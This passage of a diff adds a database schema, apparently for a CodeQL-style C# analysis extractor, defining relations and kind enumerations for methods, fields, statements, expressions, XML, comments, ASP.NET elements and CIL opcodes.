unbound_id: @method ref); + +method_location( + int id: @method ref, + int loc: @location ref); + +constructors( + unique int id: @constructor, + string name: string ref, + int declaring_type_id: @type ref, + int unbound_id: @constructor ref); + +constructor_location( + int id: @constructor ref, + int loc: @location ref); + +destructors( + unique int id: @destructor, + string name: string ref, + int declaring_type_id: @type ref, + int unbound_id: @destructor ref); + +destructor_location( + int id: @destructor ref, + int loc: @location ref); + +overrides( + int id: @callable ref, + int base_id: @callable ref); + +explicitly_implements( + int id: @member ref, + int interface_id: @interface_or_ref ref); + +local_functions( + unique int id: @local_function, + string name: string ref, + int return_type: @type ref, + int unbound_id: @local_function ref); + +local_function_stmts( + unique int fn: @local_function_stmt ref, + int stmt: @local_function ref); + +/** VARIABLES **/ + +@variable = @local_scope_variable | @field; + +@local_scope_variable = @local_variable | @parameter; + +fields( + unique int id: @field, + int kind: int ref, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @field ref); + +case @field.kind of + 1 = @addressable_field +| 2 = @constant + ; + +field_location( + int id: @field ref, + int loc: @location ref); + +localvars( + unique int id: @local_variable, + int kind: int ref, + string name: string ref, + int implicitly_typed: int ref /* 0 = no, 1 = yes */, + int type_id: @type_or_ref ref, + int parent_id: @local_var_decl_expr ref); + +case @local_variable.kind of + 1 = @addressable_local_variable +| 2 = @local_constant +| 3 = @local_variable_ref + ; + +localvar_location( + unique int id: @local_variable ref, + int loc: @location ref); + +@parameterizable = @callable | @delegate_type | @indexer | @function_pointer_type; + +#keyset[name, parent_id] +#keyset[index, parent_id] +params( + unique int id: @parameter, + string name: string ref, + int type_id: @type_or_ref ref, + int index: int ref, + int mode: int ref, /* value = 0, ref = 1, out = 2, array = 3, this = 4 */ + int parent_id: @parameterizable ref, + int unbound_id: @parameter ref); + +param_location( + int id: @parameter ref, + int loc: @location ref); + +/** STATEMENTS **/ + +@exprorstmt_parent = @control_flow_element | @top_level_exprorstmt_parent; + +statements( + unique int id: @stmt, + int kind: int ref); + +#keyset[index, parent] +stmt_parent( + unique int stmt: @stmt ref, + int index: int ref, + int parent: @control_flow_element ref); + +@top_level_stmt_parent = @callable; + +// [index, parent] is not a keyset because the same parent may be compiled multiple times +stmt_parent_top_level( + unique int stmt: @stmt ref, + int index: int ref, + int parent: @top_level_stmt_parent ref); + +case @stmt.kind of + 1 = @block_stmt +| 2 = @expr_stmt +| 3 = @if_stmt +| 4 = @switch_stmt +| 5 = @while_stmt +| 6 = @do_stmt +| 7 = @for_stmt +| 8 = @foreach_stmt +| 9 = @break_stmt +| 10 = @continue_stmt +| 11 = @goto_stmt +| 12 = @goto_case_stmt +| 13 = @goto_default_stmt +| 14 = @throw_stmt +| 15 = @return_stmt +| 16 = @yield_stmt +| 17 = @try_stmt +| 18 = @checked_stmt +| 19 = @unchecked_stmt +| 20 = @lock_stmt +| 21 = @using_block_stmt +| 22 = @var_decl_stmt +| 23 = @const_decl_stmt +| 24 = @empty_stmt +| 25 = @unsafe_stmt +| 26 = @fixed_stmt +| 27 = @label_stmt +| 28 = @catch +| 29 = @case_stmt +| 30 = @local_function_stmt +| 31 = @using_decl_stmt + ; + +@using_stmt = @using_block_stmt | @using_decl_stmt; + +@labeled_stmt = @label_stmt | @case; + +@decl_stmt = @var_decl_stmt | @const_decl_stmt | @using_decl_stmt; + +@cond_stmt = @if_stmt | @switch_stmt; + +@loop_stmt = @while_stmt | @do_stmt | @for_stmt | @foreach_stmt; + +@jump_stmt = @break_stmt | @goto_any_stmt | @continue_stmt | @throw_stmt | @return_stmt + | @yield_stmt; + +@goto_any_stmt = @goto_default_stmt | @goto_case_stmt | @goto_stmt; + + +stmt_location( + unique int id: @stmt ref, + int loc: @location ref); + +catch_type( + unique int catch_id: @catch ref, + int type_id: @type_or_ref ref, + int kind: int ref /* explicit = 1, implicit = 2 */); + +foreach_stmt_info( + unique int id: @foreach_stmt ref, + int kind: int ref /* non-async = 1, async = 2 */); + +@foreach_symbol = @method | @property | @type_or_ref; + +#keyset[id, kind] +foreach_stmt_desugar( + int id: @foreach_stmt ref, + int symbol: @foreach_symbol ref, + int kind: int ref /* GetEnumeratorMethod = 1, CurrentProperty = 2, MoveNextMethod = 3, DisposeMethod = 4, ElementType = 5 */); + +/** EXPRESSIONS **/ + +expressions( + unique int id: @expr, + int kind: int ref, + int type_id: @type_or_ref ref); + +#keyset[index, parent] +expr_parent( + unique int expr: @expr ref, + int index: int ref, + int parent: @control_flow_element ref); + +@top_level_expr_parent = @attribute | @field | @property | @indexer | @parameter | @directive_if | @directive_elif; + +@top_level_exprorstmt_parent = @top_level_expr_parent | @top_level_stmt_parent; + +// [index, parent] is not a keyset because the same parent may be compiled multiple times +expr_parent_top_level( + unique int expr: @expr ref, + int index: int ref, + int parent: @top_level_exprorstmt_parent ref); + +case @expr.kind of +/* literal */ + 1 = @bool_literal_expr +| 2 = @char_literal_expr +| 3 = @decimal_literal_expr +| 4 = @int_literal_expr +| 5 = @long_literal_expr +| 6 = @uint_literal_expr +| 7 = @ulong_literal_expr +| 8 = @float_literal_expr +| 9 = @double_literal_expr +| 10 = @string_literal_expr +| 11 = @null_literal_expr +/* primary & unary */ +| 12 = @this_access_expr +| 13 = @base_access_expr +| 14 = @local_variable_access_expr +| 15 = @parameter_access_expr +| 16 = @field_access_expr +| 17 = @property_access_expr +| 18 = @method_access_expr +| 19 = @event_access_expr +| 20 = @indexer_access_expr +| 21 = @array_access_expr +| 22 = @type_access_expr +| 23 = @typeof_expr +| 24 = @method_invocation_expr +| 25 = @delegate_invocation_expr +| 26 = @operator_invocation_expr +| 27 = @cast_expr +| 28 = @object_creation_expr +| 29 = @explicit_delegate_creation_expr +| 30 = @implicit_delegate_creation_expr +| 31 = @array_creation_expr +| 32 = @default_expr +| 33 = @plus_expr +| 34 = @minus_expr +| 35 = @bit_not_expr +| 36 = @log_not_expr +| 37 = @post_incr_expr +| 38 = @post_decr_expr +| 39 = @pre_incr_expr +| 40 = @pre_decr_expr +/* multiplicative */ +| 41 = @mul_expr +| 42 = @div_expr +| 43 = @rem_expr +/* additive */ +| 44 = @add_expr +| 45 = @sub_expr +/* shift */ +| 46 = @lshift_expr +| 47 = @rshift_expr +/* relational */ +| 48 = @lt_expr +| 49 = @gt_expr +| 50 = @le_expr +| 51 = @ge_expr +/* equality */ +| 52 = @eq_expr +| 53 = @ne_expr +/* logical */ +| 54 = @bit_and_expr +| 55 = @bit_xor_expr +| 56 = @bit_or_expr +| 57 = @log_and_expr +| 58 = @log_or_expr +/* type testing */ +| 59 = @is_expr +| 60 = @as_expr +/* null coalescing */ +| 61 = @null_coalescing_expr +/* conditional */ +| 62 = @conditional_expr +/* assignment */ +| 63 = @simple_assign_expr +| 64 = @assign_add_expr +| 65 = @assign_sub_expr +| 66 = @assign_mul_expr +| 67 = @assign_div_expr +| 68 = @assign_rem_expr +| 69 = @assign_and_expr +| 70 = @assign_xor_expr +| 71 = @assign_or_expr +| 72 = @assign_lshift_expr +| 73 = @assign_rshift_expr +/* more */ +| 74 = @object_init_expr +| 75 = @collection_init_expr +| 76 = @array_init_expr +| 77 = @checked_expr +| 78 = @unchecked_expr +| 79 = @constructor_init_expr +| 80 = @add_event_expr +| 81 = @remove_event_expr +| 82 = @par_expr +| 83 = @local_var_decl_expr +| 84 = @lambda_expr +| 85 = @anonymous_method_expr +| 86 = @namespace_expr +/* dynamic */ +| 92 = @dynamic_element_access_expr +| 93 = @dynamic_member_access_expr +/* unsafe */ +| 100 = @pointer_indirection_expr +| 101 = @address_of_expr +| 102 = @sizeof_expr +/* async */ +| 103 = @await_expr +/* C# 6.0 */ +| 104 = @nameof_expr +| 105 = @interpolated_string_expr +| 106 = @unknown_expr +/* C# 7.0 */ +| 107 = @throw_expr +| 108 = @tuple_expr +| 109 = @local_function_invocation_expr +| 110 = @ref_expr +| 111 = @discard_expr +/* C# 8.0 */ +| 112 = @range_expr +| 113 = @index_expr +| 114 = @switch_expr +| 115 = @recursive_pattern_expr +| 116 = @property_pattern_expr +| 117 = @positional_pattern_expr +| 118 = @switch_case_expr +| 119 = @assign_coalesce_expr +| 120 = @suppress_nullable_warning_expr +| 121 = @namespace_access_expr +/* C# 9.0 */ +| 122 = @lt_pattern_expr +| 123 = @gt_pattern_expr +| 124 = @le_pattern_expr +| 125 = @ge_pattern_expr +| 126 = @not_pattern_expr +| 127 = @and_pattern_expr +| 128 = @or_pattern_expr +| 129 = @function_pointer_invocation_expr +| 130 = @with_expr +/* C# 11.0 */ +| 131 = @list_pattern_expr +| 132 = @slice_pattern_expr +| 133 = @urshift_expr +| 134 = @assign_urshift_expr +/* Preprocessor */ +| 999 = @define_symbol_expr +; + +@switch = @switch_stmt | @switch_expr; +@case = @case_stmt | @switch_case_expr; +@pattern_match = @case | @is_expr; +@unary_pattern_expr = @not_pattern_expr; +@relational_pattern_expr = @gt_pattern_expr | @lt_pattern_expr | @ge_pattern_expr | @le_pattern_expr; +@binary_pattern_expr = @and_pattern_expr | @or_pattern_expr; + +@integer_literal_expr = @int_literal_expr | @long_literal_expr | @uint_literal_expr | @ulong_literal_expr; +@real_literal_expr = @float_literal_expr | @double_literal_expr | @decimal_literal_expr; +@literal_expr = @bool_literal_expr | @char_literal_expr | @integer_literal_expr | @real_literal_expr + | @string_literal_expr | @null_literal_expr; + +@assign_expr = @simple_assign_expr | @assign_op_expr | @local_var_decl_expr; +@assign_op_expr = @assign_arith_expr | @assign_bitwise_expr | @assign_event_expr | @assign_coalesce_expr; +@assign_event_expr = @add_event_expr | @remove_event_expr; + +@assign_arith_expr = @assign_add_expr | @assign_sub_expr | @assign_mul_expr | @assign_div_expr + | @assign_rem_expr +@assign_bitwise_expr = @assign_and_expr | @assign_or_expr | @assign_xor_expr + | @assign_lshift_expr | @assign_rshift_expr | @assign_urshift_expr; + +@member_access_expr = @field_access_expr | @property_access_expr | @indexer_access_expr | @event_access_expr + | @method_access_expr | @type_access_expr | @dynamic_member_access_expr; +@access_expr = @member_access_expr | @this_access_expr | @base_access_expr | @assignable_access_expr | @namespace_access_expr; +@element_access_expr = @indexer_access_expr | @array_access_expr | @dynamic_element_access_expr; + +@local_variable_access = @local_variable_access_expr | @local_var_decl_expr; +@local_scope_variable_access_expr = @parameter_access_expr | @local_variable_access; +@variable_access_expr = @local_scope_variable_access_expr | @field_access_expr; + +@assignable_access_expr = @variable_access_expr | @property_access_expr | @element_access_expr + | @event_access_expr | @dynamic_member_access_expr; + +@objectorcollection_init_expr = @object_init_expr | @collection_init_expr; + +@delegate_creation_expr = @explicit_delegate_creation_expr | @implicit_delegate_creation_expr; + +@bin_arith_op_expr = @mul_expr | @div_expr | @rem_expr | @add_expr | @sub_expr; +@incr_op_expr = @pre_incr_expr | @post_incr_expr; +@decr_op_expr = @pre_decr_expr | @post_decr_expr; +@mut_op_expr = @incr_op_expr | @decr_op_expr; +@un_arith_op_expr = @plus_expr | @minus_expr | @mut_op_expr; +@arith_op_expr = @bin_arith_op_expr | @un_arith_op_expr; + +@ternary_log_op_expr = @conditional_expr; +@bin_log_op_expr = @log_and_expr | @log_or_expr | @null_coalescing_expr; +@un_log_op_expr = @log_not_expr; +@log_expr = @un_log_op_expr | @bin_log_op_expr | @ternary_log_op_expr; + +@bin_bit_op_expr = @bit_and_expr | @bit_or_expr | @bit_xor_expr | @lshift_expr + | @rshift_expr | @urshift_expr; +@un_bit_op_expr = @bit_not_expr; +@bit_expr = @un_bit_op_expr | @bin_bit_op_expr; + +@equality_op_expr = @eq_expr | @ne_expr; +@rel_op_expr = @gt_expr | @lt_expr| @ge_expr | @le_expr; +@comp_expr = @equality_op_expr | @rel_op_expr; + +@op_expr = @assign_expr | @un_op | @bin_op | @ternary_op; + +@ternary_op = @ternary_log_op_expr; +@bin_op = @bin_arith_op_expr | @bin_log_op_expr | @bin_bit_op_expr | @comp_expr; +@un_op = @un_arith_op_expr | @un_log_op_expr | @un_bit_op_expr | @sizeof_expr + | @pointer_indirection_expr | @address_of_expr; + +@anonymous_function_expr = @lambda_expr | @anonymous_method_expr; + +@call = @method_invocation_expr | @constructor_init_expr | @operator_invocation_expr + | @delegate_invocation_expr | @object_creation_expr | @call_access_expr + | @local_function_invocation_expr | @function_pointer_invocation_expr; + +@call_access_expr = @property_access_expr | @event_access_expr | @indexer_access_expr; + +@late_bindable_expr = @dynamic_element_access_expr | @dynamic_member_access_expr + | @object_creation_expr | @method_invocation_expr | @operator_invocation_expr; + +@throw_element = @throw_expr | @throw_stmt; + +@implicitly_typeable_object_creation_expr = @object_creation_expr | @explicit_delegate_creation_expr; + +implicitly_typed_array_creation( + unique int id: @array_creation_expr ref); + +explicitly_sized_array_creation( + unique int id: @array_creation_expr ref); + +stackalloc_array_creation( + unique int id: @array_creation_expr ref); + +implicitly_typed_object_creation( + unique int id: @implicitly_typeable_object_creation_expr ref); + +mutator_invocation_mode( + unique int id: @operator_invocation_expr ref, + int mode: int ref /* prefix = 1, postfix = 2*/); + +expr_compiler_generated( + unique int id: @expr ref); + +expr_value( + unique int id: @expr ref, + string value: string ref); + +expr_call( + unique int caller_id: @expr ref, + int target_id: @callable ref); + +expr_access( + unique int accesser_id: @access_expr ref, + int target_id: @accessible ref); + +@accessible = @method | @assignable | @local_function | @namespace; + +expr_location( + unique int id: @expr ref, + int loc: @location ref); + +dynamic_member_name( + unique int id: @late_bindable_expr ref, + string name: string ref); + +@qualifiable_expr = @member_access_expr + | @method_invocation_expr + | @element_access_expr; + +conditional_access( + unique int id: @qualifiable_expr ref); + +expr_argument( + unique int id: @expr ref, + int mode: int ref); + /* mode is the same as params: value = 0, ref = 1, out = 2 */ + +expr_argument_name( + unique int id: @expr ref, + string name: string ref); + +lambda_expr_return_type( + unique int id: @lambda_expr ref, + int type_id: @type_or_ref ref); + +/** CONTROL/DATA FLOW **/ + +@control_flow_element = @stmt | @expr; + +/* XML Files */ + +xmlEncoding ( + unique int id: @file ref, + string encoding: string ref); + +xmlDTDs( + unique int id: @xmldtd, + string root: string ref, + string publicId: string ref, + string systemId: string ref, + int fileid: @file ref); + +xmlElements( + unique int id: @xmlelement, + string name: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int fileid: @file ref); + +xmlAttrs( + unique int id: @xmlattribute, + int elementid: @xmlelement ref, + string name: string ref, + string value: string ref, + int idx: int ref, + int fileid: @file ref); + +xmlNs( + int id: @xmlnamespace, + string prefixName: string ref, + string URI: string ref, + int fileid: @file ref); + +xmlHasNs( + int elementId: @xmlnamespaceable ref, + int nsId: @xmlnamespace ref, + int fileid: @file ref); + +xmlComments( + unique int id: @xmlcomment, + string text: string ref, + int parentid: @xmlparent ref, + int fileid: @file ref); + +xmlChars( + unique int id: @xmlcharacters, + string text: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int isCDATA: int ref, + int fileid: @file ref); + +@xmlparent = @file | @xmlelement; +@xmlnamespaceable = @xmlelement | @xmlattribute; + +xmllocations( + int xmlElement: @xmllocatable ref, + int location: @location_default ref); + +@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; + +/* Comments */ + +commentline( + unique int id: @commentline, + int kind: int ref, + string text: string ref, + string rawtext: string ref); + +case @commentline.kind of + 0 = @singlelinecomment +| 1 = @xmldoccomment +| 2 = @multilinecomment; + +commentline_location( + unique int id: @commentline ref, + int loc: @location ref); + +commentblock( + unique int id : @commentblock); + +commentblock_location( + unique int id: @commentblock ref, + int loc: @location ref); + +commentblock_binding( + int id: @commentblock ref, + int entity: @element ref, + int bindtype: int ref); /* 0: Parent, 1: Best, 2: Before, 3: After */ + +commentblock_child( + int id: @commentblock ref, + int commentline: @commentline ref, + int index: int ref); + +/* ASP.NET */ + +case @asp_element.kind of + 0=@asp_close_tag +| 1=@asp_code +| 2=@asp_comment +| 3=@asp_data_binding +| 4=@asp_directive +| 5=@asp_open_tag +| 6=@asp_quoted_string +| 7=@asp_text +| 8=@asp_xml_directive; + +@asp_attribute = @asp_code | @asp_data_binding | @asp_quoted_string; + +asp_elements( + unique int id: @asp_element, + int kind: int ref, + int loc: @location ref); + +asp_comment_server(unique int comment: @asp_comment ref); +asp_code_inline(unique int code: @asp_code ref); +asp_directive_attribute( + int directive: @asp_directive ref, + int index: int ref, + string name: string ref, + int value: @asp_quoted_string ref); +asp_directive_name( + unique int directive: @asp_directive ref, + string name: string ref); +asp_element_body( + unique int element: @asp_element ref, + string body: string ref); +asp_tag_attribute( + int tag: @asp_open_tag ref, + int index: int ref, + string name: string ref, + int attribute: @asp_attribute ref); +asp_tag_name( + unique int tag: @asp_open_tag ref, + string name: string ref); +asp_tag_isempty(int tag: @asp_open_tag ref); + +/* Common Intermediate Language - CIL */ + +case @cil_instruction.opcode of + 0 = @cil_nop +| 1 = @cil_break +| 2 = @cil_ldarg_0 +| 3 = @cil_ldarg_1 +| 4 = @cil_ldarg_2 +| 5 = @cil_ldarg_3 +| 6 = @cil_ldloc_0 +| 7 = @cil_ldloc_1 +| 8 = @cil_ldloc_2 +| 9 = @cil_ldloc_3 +| 10 = @cil_stloc_0 +| 11 = @cil_stloc_1 +| 12 = @cil_stloc_2 +| 13 = @cil_stloc_3 +| 14 = @cil_ldarg_s +| 15 = @cil_ldarga_s +| 16 = @cil_starg_s +| 17 = @cil_ldloc_s +| 18 = @cil_ldloca_s +| 19 = @cil_stloc_s +| 20 = @cil_ldnull +| 21 = @cil_ldc_i4_m1 +| 22 = @cil_ldc_i4_0 +| 23 = @cil_ldc_i4_1 +| 24 = @cil_ldc_i4_2 +| 25 = @cil_ldc_i4_3 +| 26 = @cil_ldc_i4_4 +| 27 = @cil_ldc_i4_5 +| 28 = @cil_ldc_i4_6 +| 29 = @cil_ldc_i4_7 +| 30 = @cil_ldc_i4_8 +| 31 = @cil_ldc_i4_s +| 32 = @cil_ldc_i4 +| 33 = @cil_ldc_i8 +| 34 = @cil_ldc_r4 +| 35 = @cil_ldc_r8 +| 37 = @cil_dup +| 38 = @cil_pop +| 39 = @cil_jmp +| 40 = @cil_call +| 41 = @cil_calli +| 42 = @cil_ret +| 43 = @cil_br_s +| 44 = @cil_brfalse_s +| 45 = @cil_brtrue_s +| 46 = @cil_beq_s +| 47 = @cil_bge_s +| 48 = @cil_bgt_s +| 49 = @cil_ble_s +| 50 = @cil_blt_s +| 51 = @cil_bne_un_s +| 52 = @cil_bge_un_s +| 53 = @cil_bgt_un_s +| 54 = @cil_ble_un_s +| 55 = @cil_blt_un_s +| 56 = @cil_br +| 57 = @cil_brfalse +| 58 = @cil_brtrue +| 59 = @cil_beq +| 60 = @cil_bge +| 61 = @cil_bgt +| 62 = @cil_ble +| 63 = @cil_blt +| 64 = @cil_bne_un +| 65 = @cil_bge_un +| 66 = @cil_bgt_un +| 67 = @cil_ble_un +| 68 = @cil_blt_un +| 69 = @cil_switch +| 70 = @cil_ldind_i1 +| 71 = @cil_ldind_u1 +| 72 = @cil_ldind_i2 +| 73 = @cil_ldind_u2 +| 74 = @cil_ldind_i4 +| 75 = @cil_ldind_u4 +| 76 = @cil_ldind_i8 +| 77 = @cil_ldind_i +| 78 = @cil_ldind_r4 +| 79 = @cil_ldind_r8 +| 80 = @cil_ldind_ref +| 81 = @cil_stind_ref +| 82 = @cil_stind_i1 +| 83 = @cil_stind_i2 +| 84 = @cil_stind_i4 +| 85 = @cil_stind_i8 +| 86 = @cil_stind_r4 +| 87 = @cil_stind_r8 +| 88 = @cil_add +| 89 = @cil_sub +| 90 = @cil_mul +| 91 = @cil_div +| 92 = @cil_div_un +| 93 = @cil_rem +| 94 = @cil_rem_un +| 95 = @cil_and +| 96 = @cil_or +| 97 = @cil_xor +| 98 = @cil_shl +| 99 = @cil_shr +| 100 = @cil_shr_un +| 101 = @cil_neg +| 102 = @cil_not +| 103 = @cil_conv_i1 +| 104 = @cil_conv_i2 +| 105 = @cil_conv_i4 +| 106 = @cil_conv_i8 +| 107 = @cil_conv_r4 +| 108 = @cil_conv_r8 +| 109 = @cil_conv_u4 +| 110 = @cil_conv_u8 +| 111 = @cil_callvirt +| 112 = @cil_cpobj +| 113 = @cil_ldobj +| 114 = @cil_ldstr +| 115 = @cil_newobj +| 116 = @cil_castclass +| 117 = @cil_isinst +| 118 = @cil_conv_r_un +| 121 = @cil_unbox +| 122 = @cil_throw +| 123 = @cil_ldfld +| 124 = @cil_ldflda +| 125 = @cil_stfld +| 126 = @cil_ldsfld +| 127 = @cil_ldsflda +| 128 = @cil_stsfld +| 129 = @cil_stobj +| 130 = @cil_conv_ovf_i1_un +| 131 = @cil_conv_ovf_i2_un +| 132 = @cil_conv_ovf_i4_un +| 133 = @cil_conv_ovf_i8_un +| 134 = @cil_conv_ovf_u1_un +| 135 = @cil_conv_ovf_u2_un +| 136 = @cil_conv_ovf_u4_un +| 137 = @cil_conv_ovf_u8_un +| 138 = @cil_conv_ovf_i_un +| 139 = @cil_conv_ovf_u_un +| 140 = @cil_box +| 141 = @cil_newarr +| 142 = @cil_ldlen +| 143 = @cil_ldelema +| 144 = @cil_ldelem_i1 +| 145 = @cil_ldelem_u1 +| 146 = @cil_ldelem_i2 +| 147 = @cil_ldelem_u2 +| 148 = @cil_ldelem_i4 +| 149 = @cil_ldelem_u4 +| 150 = @cil_ldelem_i8 +| 151 = @cil_ldelem_i +| 152 = @cil_ldelem_r4 +| 153 = @cil_ldelem_r8 +| 154 = @cil_ldelem_ref +| 155 = @cil_stelem_i +| 156 = @cil_stelem_i1 +| 157 = @cil_stelem_i2 +| 158 = @cil_stelem_i4 +| 159 = @cil_stelem_i8 +| 160 = @cil_stelem_r4 +| 161 = @cil_stelem_r8 +| 162 = @cil_stelem_ref +| 163 = @cil_ldelem +| 164 = @cil_stelem +| 165 = @cil_unbox_any +| 179 = @cil_conv_ovf_i1 +| 180 = @cil_conv_ovf_u1 +| 181 = @cil_conv_ovf_i2 +| 182 = @cil_conv_ovf_u2 +| 183 = @cil_conv_ovf_i4 +| 184 = @cil_conv_ovf_u4 +| 185 = @cil_conv_ovf_i8 +| 186 = @cil_conv_ovf_u8 +| 194 = @cil_refanyval +| 195 = @cil_ckinfinite +| 198 = @cil_mkrefany +| 208 = @cil_ldtoken +| 209 = @cil_conv_u2 +| 210 = @cil_conv_u1 +| 211 = @cil_conv_i +| 212 = @cil_conv_ovf_i +| 213 = @cil_conv_ovf_u +| 214 = @cil_add_ovf +| 215 = @cil_add_ovf_un +| 216 = @cil_mul_ovf +| 217 = @cil_mul_ovf_un +| 218 = @cil_sub_ovf +| 219 = @cil_sub_ovf_un +| 220 = @cil_endfinally +| 221 = @cil_leave +| 222 = @cil_leave_s +| 223 = @cil_stind_i +| 224 = @cil_conv_u +| 65024 = @cil_arglist +| 65025 = @cil_ceq +| 65026 = @cil_cgt +| 65027 = @cil_cgt_un +| 65028 = @cil_clt +| 65029 = @cil_clt_un +| 65030 = @cil_ldftn +| 65031 = @cil_ldvirtftn +| 65033 = @cil_ldarg +| 65034 = @cil_ldarga +| 65035 = @cil_starg +| 65036 = @cil_ldloc +| 65037 = @cil_ldloca +| 65038 = @cil_stloc +| 65039 = @cil_localloc +| 65041 = @cil_endfilter +| 65042 = @cil_unaligned +| 65043 = @cil_volatile +| 65044 = @cil_tail +| 65045 = @cil_initobj +| 65046 = @cil_constrained +| 65047 = @cil_cpblk +| 65048 = @cil_initblk +| 65050 = @cil_rethrow +| 65052 = @cil_sizeof +| 65053 = @cil_refanytype +| 65054 = @cil_readonly +; + +// CIL ignored instructions + +@cil_ignore = @cil_nop | @cil_break | @cil_volatile | @cil_unaligned; + +// CIL local/parameter/field access + +@cil_ldarg_any = @cil_ldarg_0 | @cil_ldarg_1 | @cil_ldarg_2 | @cil_ldarg_3 | @cil_ldarg_s | @cil_ldarga_s | @cil_ldarg | @cil_ldarga; +@cil_starg_any = @cil_starg | @cil_starg_s; + +@cil_ldloc_any = @cil_ldloc_0 | @cil_ldloc_1 | @cil_ldloc_2 | @cil_ldloc_3 | @cil_ldloc_s | @cil_ldloca_s | @cil_ldloc | @cil_ldloca; +@cil_stloc_any = @cil_stloc_0 | @cil_stloc_1 | @cil_stloc_2 | @cil_stloc_3 | @cil_stloc_s | @cil_stloc; + +@cil_ldfld_any = @cil_ldfld | @cil_ldsfld | @cil_ldsflda | @cil_ldflda; +@cil_stfld_any = @cil_stfld | @cil_stsfld; + +@cil_local_access = @cil_stloc_any | @cil_ldloc_any; +@cil_arg_access = @cil_starg_any | @cil_ldarg_any; +@cil_read_access = @cil_ldloc_any | @cil_ldarg_any | @cil_ldfld_any; +@cil_write_access = @cil_stloc_any | @cil_starg_any | @cil_stfld_any; + +@cil_stack_access = @cil_local_access | @cil_arg_access; +@cil_field_access = @cil_ldfld_any | @cil_stfld_any; + +@cil_access = @cil_read_access | @cil_write_access; + +// CIL constant/literal instructions + +@cil_ldc_i = @cil_ldc_i4_any | @cil_ldc_i8; + +@cil_ldc_i4_any = @cil_ldc_i4_m1 | @cil_ldc_i4_0 | @cil_ldc_i4_1 | @cil_ldc_i4_2 | @cil_ldc_i4_3 | + @cil_ldc_i4_4 | @cil_ldc_i4_5 | @cil_ldc_i4_6 | @cil_ldc_i4_7 | @cil_ldc_i4_8 | @cil_ldc_i4_s | @cil_ldc_i4; + +@cil_ldc_r = @cil_ldc_r4 | @cil_ldc_r8; + +@cil_literal = @cil_ldnull | @cil_ldc_i | @cil_ldc_r | @cil_ldstr; + +// Control flow + +@cil_conditional_jump = @cil_binary_jump | @cil_unary_jump; +@cil_binary_jump = @cil_beq_s | @cil_bge_s | @cil_bgt_s | @cil_ble_s | @cil_blt_s | + @cil_bne_un_s | @cil_bge_un_s | @cil_bgt_un_s | @cil_ble_un_s | @cil_blt_un_s | + @cil_beq | @cil_bge | @cil_bgt | @cil_ble | @cil_blt | + @cil_bne_un | @cil_bge_un | @cil_bgt_un | @cil_ble_un | @cil_blt_un; +@cil_unary_jump = @cil_brfalse_s | @cil_brtrue_s | @cil_brfalse | @cil_brtrue | @cil_switch; +@cil_unconditional_jump = @cil_br | @cil_br_s | @cil_leave_any; +@cil_leave_any = @cil_leave | @cil_leave_s; +@cil_jump = @cil_unconditional_jump | @cil_conditional_jump; + +// CIL call instructions + +@cil_call_any = @cil_jmp | @cil_call | @cil_calli | @cil_tail | @cil_callvirt | @cil_newobj; + +// CIL expression instructions + +@cil_expr = @cil_literal | @cil_binary_expr | @cil_unary_expr | @cil_call_any | @cil_read_access | + @cil_newarr | @cil_ldtoken | @cil_sizeof | + @cil_ldftn | @cil_ldvirtftn | @cil_localloc | @cil_mkrefany | @cil_refanytype | @cil_arglist | @cil_dup; + +@cil_unary_expr = + @cil_conversion_operation | @cil_unary_arithmetic_operation | @cil_unary_bitwise_operation| + @cil_ldlen | @cil_isinst | @cil_box | @cil_ldobj | @cil_castclass | @cil_unbox_any | + @cil_ldind | @cil_unbox; + +@cil_conversion_operation = + @cil_conv_i1 | @cil_conv_i2 | @cil_conv_i4 | @cil_conv_i8 | + @cil_conv_u1 | @cil_conv_u2 | @cil_conv_u4 | @cil_conv_u8 | + @cil_conv_ovf_i | @cil_conv_ovf_i_un | @cil_conv_ovf_i1 | @cil_conv_ovf_i1_un | + @cil_conv_ovf_i2 | @cil_conv_ovf_i2_un | @cil_conv_ovf_i4 | @cil_conv_ovf_i4_un | + @cil_conv_ovf_i8 | @cil_conv_ovf_i8_un | @cil_conv_ovf_u | @cil_conv_ovf_u_un | + @cil_conv_ovf_u1 | @cil_conv_ovf_u1_un | @cil_conv_ovf_u2 | @cil_conv_ovf_u2_un | + @cil_conv_ovf_u4 | @cil_conv_ovf_u4_un | @cil_conv_ovf_u8 | @cil_conv_ovf_u8_un | + @cil_conv_r4 | @cil_conv_r8 | @cil_conv_ovf_u2 | @cil_conv_ovf_u2_un | + @cil_conv_i | @cil_conv_u | @cil_conv_r_un; + +@cil_ldind = @cil_ldind_i | @cil_ldind_i1 | @cil_ldind_i2 | @cil_ldind_i4 | @cil_ldind_i8 | + @cil_ldind_r4 | @cil_ldind_r8 | @cil_ldind_ref | @cil_ldind_u1 | @cil_ldind_u2 | @cil_ldind_u4; + +@cil_stind = @cil_stind_i | @cil_stind_i1 | @cil_stind_i2 | @cil_stind_i4 | @cil_stind_i8 | + @cil_stind_r4 | @cil_stind_r8 | @cil_stind_ref; + +@cil_bitwise_operation = @cil_binary_bitwise_operation | @cil_unary_bitwise_operation; + +@cil_binary_bitwise_operation = @cil_and | @cil_or | @cil_xor | @cil_shr | @cil_shr | @cil_shr_un | @cil_shl; + +@cil_binary_arithmetic_operation = @cil_add | @cil_sub | @cil_mul | @cil_div | @cil_div_un | + @cil_rem | @cil_rem_un | @cil_add_ovf | @cil_add_ovf_un | @cil_mul_ovf | @cil_mul_ovf_un | + @cil_sub_ovf | @cil_sub_ovf_un; + +@cil_unary_bitwise_operation = @cil_not; + +@cil_binary_expr = @cil_binary_arithmetic_operation | @cil_binary_bitwise_operation | @cil_read_array | @cil_comparison_operation; + +@cil_unary_arithmetic_operation = @cil_neg; + +@cil_comparison_operation = @cil_cgt_un | @cil_ceq | @cil_cgt | @cil_clt | @cil_clt_un; + +// Elements that retrieve an address of something +@cil_read_ref = @cil_ldloca_s | @cil_ldarga_s | @cil_ldflda | @cil_ldsflda | @cil_ldelema; + +// CIL array instructions + +@cil_read_array = + @cil_ldelem | @cil_ldelema | @cil_ldelem_i1 | @cil_ldelem_ref | @cil_ldelem_i | + @cil_ldelem_i1 | @cil_ldelem_i2 | @cil_ldelem_i4 | @cil_ldelem_i8 | @cil_ldelem_r4 | + @cil_ldelem_r8 | @cil_ldelem_u1 | @cil_ldelem_u2 | @cil_ldelem_u4; + +@cil_write_array = @cil_stelem | @cil_stelem_ref | + 